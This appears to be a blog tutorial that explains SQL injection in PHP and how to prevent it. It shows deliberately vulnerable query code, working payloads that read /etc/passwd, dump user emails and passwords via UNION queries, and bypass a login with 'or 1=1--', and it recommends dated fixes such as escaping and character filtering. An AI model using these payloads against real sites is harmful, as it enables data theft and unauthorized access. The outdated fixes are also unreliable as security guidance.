Tip: SQL Injection and how to prevent it.

Hi guys, I assume you are familiar with SQL and PHP. In this tutorial, I’d show a quick tip on how SQL Injection works and how to fix it.

A SQL injection attack consists of insertion of a SQL query via the input data from the client to the web application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete/Drop), execute administration operations on the database and issue commands to the operating system.

SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

Ok, lets look at a basic example from user.php

<?php
  $id = $_GET['id'];
  $result = mysql_query( "SELECT name FROM members WHERE id = '$id'");
?>

In the code snippet above, the “id” variable is not filtered, we can inject our SQL code in “id” variable. For example:

“http://localhost/user.php?id=1+union+all+select+1,null,load_file(‘etc/passwd’),4–“

And we get the “etc/passwd” file if magic_quotes = off and users have file privileges.

Lets look at another example from house/listing_view.php

$id = $_GET['itemnr'];
require_once($home."mysqlinfo.php");
$query = "SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals where id=$id";
$result = mysql_query($query);
if(mysql_num_rows($result))
{
    $r = mysql_fetch_array($result);
}

Here we see that “id” variable value is the value set for “itemnr” and is not filtered in any way, so we can inject our code. Lets make a request:

“http://localhost/house/listing_view.php?itemnr=null+union+all+select+1,2,3,
concat(0x3a,email,password),5,6,7,8,9,10+from+users–“

And we get the email and the password from the users table.

Login Bypass

Lets look at another code snippet from /admin/login.php

$postuser = $_POST['username'];
$postpass = md5($_POST['password']); 
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE username = '$postuser' AND password = '$postpass'") 
or die("<p>" . mysql_error() . "</p>\n");

The variables here are not properly checked. We can bypass this login by injecting the following username and password:

username : admin ' or ' 1=1--
password : anything

When we pass in these values to the form, the code will eventually look like this when executing;

$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE username = 'admin' ' or ' 1=1-- AND password = 'anything'")

The “–” terminates the rest of the query, so we have something like SELECT * FROM " . $tablestart . "login WHERE username = 'admin' ' or ' 1=1

Fixing your codes

The simple way: Don’t allow special chars in variables. For numeric variables, use (int), example $id=(int)$_GET['id']; or $id = intval($_GET['id']);

Another way for non-numeric variables: Filter all special chars used in SQL: – , . ( ) ‘ ” _ + / * etc.

Also using mysql_real_escape_string will help:

$name = mysql_real_escape_string( $_POST[‘name’] );
$pwd  = mysql_real_escape_string( $_POST[‘pwd’] );

There are so many ways to prevent this attack, but if you are a little bit lazy and just want to get your website up and running without bothering yourself much about SQL injection attacks and some other security issues like Cross Site Scripting etc. Just use a framework to build your website.

Most of these PHP frameworks are properly built with MVC in mind and you can choose to filter your POST and GET request to prevent injection easily. Yii, Zend and Codeigniter are some of the best frameworks around.

I hope by now, you have an idea of how SQL injection works and what to do with it. This is just a quick tip of what SQL injection is all about and how to prevent it.

I write codes... web, mobile, desktop and hack stuffs

Leave a Reply

Your email address will not be published. Required fields are marked *